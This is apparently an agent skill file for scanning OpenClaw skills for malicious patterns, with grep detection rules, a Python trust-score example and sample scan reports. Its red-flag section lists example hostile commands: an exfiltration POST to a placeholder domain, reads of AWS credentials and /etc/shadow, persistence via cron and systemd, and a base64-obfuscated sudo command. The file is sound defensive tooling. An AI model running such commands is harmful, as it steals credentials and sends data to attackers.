Skill Security Scanner
Scan OpenClaw skills for security issues and suspicious patterns, and assign each a trust score. Helps users make informed decisions about which skills to trust.
When to Use
- Before installing a new skill from ClawHub
- Auditing existing installed skills
- User asks "is this skill safe?"
- After ClawHavoc-type incidents (malicious skills in the ecosystem)
- Before running untrusted skills
Quick Reference
| Command | Purpose |
|---------|---------|
| scan-skill <path> | Scan a single skill |
| scan-all | Scan all skills in workspace |
| trust-score <path> | Get quick trust score (0-100) |
| list-permissions <path> | List all requested permissions |
Scanning Strategy
1. Check Metadata (Frontmatter)
Look for:
- bins - CLI tools the skill needs
- env - Environment variables (API keys, tokens)
- requires.config - Required config settings
- requires.bins - Binary dependencies
Red flags:
- Skills requesting many bins without clear purpose
- Env vars for sensitive services (AWS keys, database passwords)
- Config requiring admin/elevated permissions
2. Analyze SKILL.md Content
Suspicious patterns to detect:
# Network calls to unknown domains
grep -E "(curl|wget|http|https).*\.com" SKILL.md
grep -E "fetch\(|axios\(" SKILL.md
# File system access beyond declared scope
grep -E "rm -rf|dd |mkfs" SKILL.md
# Credential access
grep -E "password|secret|token|key" SKILL.md
# Execution of downloaded code
grep -E "eval\(|exec\(|system\(" SKILL.md
# Base64 encoded commands
grep -E "base64|-enc|-encode" SKILL.md
3. Trust Score Calculation
Score from 0-100 based on:
| Factor | Weight | Criteria |
|--------|--------|----------|
| Author reputation | 20% | Known author? Official OpenClaw skill? |
| Permission scope | 30% | Minimal bins/envs? |
| Code patterns | 25% | No suspicious commands |
| Update frequency | 15% | Recently updated? |
| Download count | 10% | Popular = more scrutiny |
4. Risk Levels
| Score | Risk | Action |
|-------|------|--------|
| 80-100 | 🟢 Low | Safe to use |
| 60-79 | 🟡 Medium | Review before use |
| 40-59 | 🟠 High | Use with caution |
| 0-39 | 🔴 Critical | Don't use |
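The scan and scoring steps above, combined in one added example (not the scanner's own code): it applies the page's grep patterns line by line, then feeds the hits into the weighted score and risk bands. It goes beyond the page in one respect, decoding base64 runs and re-scanning the decoded text. That step, the 0.25-per-category penalty and the `FACTORS` sub-scores are assumptions, since the page does not define how each factor is scored.

```python
import base64
import re

# Patterns copied from the grep commands under "Analyze SKILL.md Content".
PATTERNS = {
    "network": r"(curl|wget|http|https).*\.com|fetch\(|axios\(",
    "filesystem": r"rm -rf|dd |mkfs",
    "credentials": r"password|secret|token|key",
    "execution": r"eval\(|exec\(|system\(",
    "encoding": r"base64|-enc|-encode",
}
# Weights from the "Trust Score Calculation" table.
WEIGHTS = {"author": 0.20, "permissions": 0.30, "code": 0.25, "updates": 0.15, "downloads": 0.10}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def scan(text):
    """Return sorted (line_no, category) hits, re-scanning decoded base64 runs."""
    hits = set()
    for no, line in enumerate(text.splitlines(), 1):
        candidates = [line]
        for blob in B64_RUN.findall(line):
            try:  # decode so a wrapped command is matched like plain text
                candidates.append(base64.b64decode(blob, validate=True).decode("ascii"))
                hits.add((no, "encoding"))
            except ValueError:
                pass  # not base64, or not text once decoded
        for cand in candidates:
            hits.update((no, cat) for cat, pat in PATTERNS.items() if re.search(pat, cand))
    return sorted(hits)

def trust_score(factors, hits):
    """Weighted 0-100 score. Assumed rule: 'code' loses 0.25 per category hit."""
    sub = dict(factors, code=max(0.0, 1.0 - 0.25 * len({cat for _, cat in hits})))
    return round(100 * sum(w * sub[name] for name, w in WEIGHTS.items()))

def risk_level(score):
    """Map a score onto the bands of the "Risk Levels" table."""
    bands = ((80, "Low"), (60, "Medium"), (40, "High"))
    return next((label for floor, label in bands if score >= floor), "Critical")

# Constructed sample text and assumed sub-scores in [0, 1]; the encoded command is the page's own example.
HIDDEN = base64.b64encode(b'grep "password" /etc/shadow').decode()
SAMPLE = f"bins: [curl, jq]\nUse curl https://api.example.com/v1/forecast\necho {HIDDEN} | base64 -d\n"
FACTORS = {"author": 0.0, "permissions": 0.5, "updates": 1.0, "downloads": 0.5}

if __name__ == "__main__":
    score = trust_score(FACTORS, scan(SAMPLE))
    print(scan(SAMPLE), score, risk_level(score))
```

On the sample, the plain patterns flag line 3 only as `encoding`; the `credentials` hit appears only after the blob is decoded.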
Output Format
Scan Result
Skill: <skill-name>
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Trust Score: <score>/100 (<risk-level>)
Permissions Requested:
• bins: curl, jq
• env: OPENWEATHER_API_KEY
⚠️ Issues Found:
1. [MEDIUM] Requests network access but no clear purpose
2. [LOW] No recent updates (6+ months)
✅ Positive Signs:
• Official OpenClaw skill
• Clear documentation
Trust Report
Generate a full report:
## Security Analysis: <skill-name>
### Score: <score>/100 (<risk-level>)
### Permissions Analysis
| Type | Requested | Risk |
|------|-----------|------|
| bins | curl, jq | Low |
| env | API_KEY | Medium |
### Code Pattern Analysis
- ✅ No suspicious execution patterns
- ✅ No credential access attempts
- ⚠️ 2 network calls to external domains
### Recommendation
<RECOMMENDATION>
Common Red Flags
High Risk Patterns
- Network exfiltration
  # Example: sending data to unknown servers
  # curl -X POST https://SUSPICIOUS-DOMAIN/exfil
  # fetch("https://data-collector.DOMAIN")
- Credential harvesting
  # Example: reading credentials
  # cat ~/.aws/credentials
  # grep "password" /etc/shadow
- Persistence mechanisms
  # Example: auto-start, cron, systemd
  # sudo crontab -l
  # systemctl enable
- Obfuscated code
  # Example: base64 encoded commands
  echo "c3VkbyByb20gL3J0ZiAv" | base64 -d
Medium Risk Patterns
- Excessive permissions - More bins/envs than needed
- No documentation - Unclear what skill does
- Outdated - No updates in 6+ months
- Third-party dependencies - Unknown npm/go packages
Green Flags
- ✅ Official OpenClaw skills (openclaw/skills)
- ✅ Clear, specific permissions
- ✅ Active maintenance (recent commits)
- ✅ Open source with clear code
- ✅ Known author with reputation
Workflows
Before Installing New Skill
# 1. Get skill path (ClawHub or local)
# 2. Run full scan
scan-skill /path/to/skill
# 3. Check trust score
trust-score /path/to/skill
# 4. Review issues
# 5. Decide: install / skip / investigate more
Regular Security Audit
# Weekly: scan all installed skills
scan-all
# Monthly: generate full report
# Save to .learnings/ for documentation
Quick Trust Check
# For quick decision
trust-score <path>
# If score < 60, do full scan
# If score < 40, don't use
Integration with Other Skills
- Works with self-improving-agent - Log security findings
- Use memory - Remember trust scores for known skills
- Report findings to user before risky operations
Best Practices
- Always scan before installing untrusted skills
- Document scan results in .learnings/
- Share findings with community (anonymized)
- Update trust scores when vulnerabilities found
- Trust but verify - Don't rely solely on automated scanning
Examples
Example 1: Scanning Before Install
User wants to install "cool-new-skill" from ClawHub:
> scan-skill ./skills/cool-new-skill
Scanning: cool-new-skill
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Trust Score: 72/100 (🟡 Medium)
Permissions:
• bins: none
• env: none
⚠️ Issues:
• No recent updates (8 months)
• Unknown author
✅ Positives:
• Clear documentation
• Minimal permissions
Recommendation: Safe to try, monitor usage
Example 2: Finding Malware
> scan-skill ./skills/suspicious-skill
Scanning: suspicious-skill
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Trust Score: 23/100 (🔴 CRITICAL)
Permissions:
• bins: curl, base64
• env: API_KEY, SECRET_TOKEN
🚨 CRITICAL ISSUES FOUND:
1. Network exfiltration pattern detected
2. Credential access attempt
3. Obfuscated commands (base64)
Recommendation: DO NOT USE - Potential malware
Example 3: Audit Report
> scan-all
Scanning all skills in ~/.openclaw/workspace/skills/
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
✅ github: 95/100 (safe)
⚠️ todoist: 68/100 (review needed)
✅ self-improving-agent: 92/100 (safe)
🔴 unknown-skill: 34/100 (remove recommended)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Summary: 2 safe, 1 review, 1 remove
Related
- ClawHavoc incident (Feb 2026) - 341 malicious skills
- Agent Trust Hub - Third-party security tooling
- OpenClaw Security docs: docs.openclaw.ai/gateway/security